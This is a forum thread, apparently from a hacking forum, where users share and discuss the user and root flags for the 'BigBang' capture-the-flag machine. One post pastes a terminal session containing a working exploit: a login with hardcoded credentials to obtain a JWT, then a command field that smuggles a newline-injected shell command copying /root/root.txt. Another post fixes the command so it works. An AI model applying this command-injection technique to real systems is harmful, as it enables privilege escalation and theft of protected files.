01-27-2025, 10:29 AM
thank you for the share !
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
|
BigBang user+root flag
by RedBlock - Sunday January 26, 2025 at 06:42 PM
|
|
01-27-2025, 10:29 AM
thank you for the share !
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
01-27-2025, 02:21 PM
Let's see whats this jobs look like, hope this is some good shit.
01-27-2025, 04:22 PM
Just... trying... to... get... 4... credits..........
lol
01-27-2025, 04:37 PM
(01-27-2025, 06:56 AM)LostGem Wrote: It worked pretty well for me Nothing, I don't know how it works but it doesn't work for me, any alternatives? developer@bigbang:~$ curl -s -X POST -H 'Content-Type: application/json' -d '{"username":"developer", "password":"bigbang"}' http://localhost:9090/login | grep -oP '"access_token":"\K[^"]+' curl -s -X POST -H 'Content-Type: application/json' -d '{"username":"developer", "password":"bigbang"}' http://localhost:9090/login | grep -oP '"access_token":"\K[^"]+' | xargs -I {} echo curl -X POST -H 'Authorization: Bearer {}' -H 'Content-Type: application/json' 127.0.0.1:9090/command --data '{"command":"send_image", "output_file":"\ncp --no-preserve=mode,ownership /root/root.txt /home/developer/pwned.txt"}' eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzk5NTczOSwianRpIjoiZTNlNDg3NTAtMTVlOC00ZDlmLWE0YzktYjc1NTdiNWQwZGYzIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczNzk5NTczOSwiY3NyZiI6ImEyNWIyYmEyLWIxODctNGJiNi05ZjdjLTVkNmJhYThmYTczNyIsImV4cCI6MTczNzk5OTMzOX0.Xro3rRD2b3KHMKhVIM03USN1OJ6dSyYWEfiUcs89wNA curl -X POST -H Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzk5NTc0MCwianRpIjoiMGNhMzc0ZmUtOGE5NS00ZWU2LWEyYzAtNTE5OGE3OGM0YzA4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczNzk5NTc0MCwiY3NyZiI6IjcxZWFmMTA4LWEwYmUtNDkzNy1hZDczLWQ2MmUzNDVkYWNlZCIsImV4cCI6MTczNzk5OTM0MH0.Do3P3adu4CdoHZrLrmxNvDwqgXcdIwicosorf8CU3EQ -H Content-Type: application/json 127.0.0.1:9090/command --data {"command":"send_image", "output_file":"\ncp --no-preserve=mode,ownership /root/root.txt /home/developer/pwned.txt"} developer@bigbang:~$ curl -s -X POST -H 'Content-Type: application/json' -d '{"username":"developer", "password":"bigbang"}' http://localhost:9090/login | grep -oP '"access_token":"\K[^"]+'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzk5NTczOSwianRpIjoiZTNlNDg3NTAtMTVlOC00ZDlmLWE0YzktYjc1NTdiNWQwZGYzIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczNzk5NTczOSwiY3NyZiI6ImEyNWIyYmEyLWIxODctNGJiNi05ZjdjLTVkNmJhYThmYTczNyIsImV4cCI6MTczNzk5OTMzOX0.Xro3rRD2b3KHMKhVIM03USN1OJ6dSyYWEfiUcs89wNA developer@bigbang:~$ curl -s -X POST -H 'Content-Type: application/json' -d '{"username":"developer", "password":"bigbang"}' http://localhost:9090/login | grep -oP '"access_token":"\K[^"]+' | xargs -I {} echo curl -X POST -H 'Authorization: Bearer {}' -H 'Content-Type: application/json' 127.0.0.1:9090/command --data '{"command":"send_image", "output_file":"\ncp --no-preserve=mode,ownership /root/root.txt /home/developer/pwned.txt"}' curl -X POST -H Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzk5NTc3NCwianRpIjoiYzFlMjAzYzQtMGM3Zi00NWQxLTk3YzctMWYzYTQyMmVjYzZlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczNzk5NTc3NCwiY3NyZiI6ImM3YzFkMjNjLWI1OGUtNDM4ZC04ZDg3LTk2YmQzOGVhYThmYiIsImV4cCI6MTczNzk5OTM3NH0.uSg7QLUOJdafSOtnn906_xtP9Te17S0cqpYSxrbxCIw -H Content-Type: application/json 127.0.0.1:9090/command --data {"command":"send_image", "output_file":"\ncp --no-preserve=mode,ownership /root/root.txt /home/developer/pwned.txt"} developer@bigbang:~$ ls android linpeas.sh snap developer@bigbang:~$
01-27-2025, 04:49 PM
let me see i am stuck in this machine for a while now
01-27-2025, 04:58 PM
01-27-2025, 05:12 PM
I'd love a detailed write-up, but for anyone running into an issue with the command to get root.txt, there is a missing pipe | between the +' and the second curl. once you correct that the command works exactly as expected. got me both flags very quickly.
01-27-2025, 06:30 PM
Thanks a lot Mr president!
01-27-2025, 06:57 PM
at this point i dont even know if cnext-exploit.py is the right place to even look
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| HTB Eloquia User and Root Flags - Insane Box | 13 | 350 |
03-27-2026, 06:14 PM Last Post: |
||
| [Season10] ROOT Pterodactyl | 55 | 1,068 |
03-27-2026, 04:03 AM Last Post: |
||
| [Season10] USER Pterodactyl | 38 | 531 |
03-27-2026, 03:59 AM Last Post: |
||
| [Free] CDSA Path Flag -All | 35 | 3,564 |
02-10-2026, 03:31 PM Last Post: |
||
| CPTS-FLAG | 13 | 5,562 |
02-10-2026, 11:08 AM Last Post: |
||